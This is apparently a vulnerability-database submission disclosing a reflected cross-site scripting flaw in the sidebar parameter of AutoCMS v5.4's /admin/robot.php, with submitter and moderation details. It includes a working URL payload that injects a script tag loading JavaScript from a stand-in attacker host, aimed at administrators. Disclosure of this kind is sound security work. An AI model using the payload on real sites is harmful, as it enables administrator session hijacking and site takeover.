| Title | AutoCMS v5.4 Cross Site Scripting |
|---|---|
| Description | Summary<br>AutoCMS v5.4 was discovered to contain an XSS vulnerability via the sidebar parameter at /admin/robot.php.<br>Affected Component: /admin/robot.php<br>Description: The application fails to sufficiently sanitize and escape input parameters `page` and `sidebar`. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.<br>Payload:<br>`http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E` |
| Source | https://github.com/Hebing123/cve/issues/68 |
| User | jiashenghe (UID 39445) |
| Submission | 2024-09-13 05:22 AM (2 years ago) |
| Moderation | 2024-09-14 08:43 AM (1 day later) |
| Status | Accepted |
| VulDB entry | 277503 [AutoCMS 5.4 /admin/robot.php sidebar cross site scripting] |
| Points | 20 |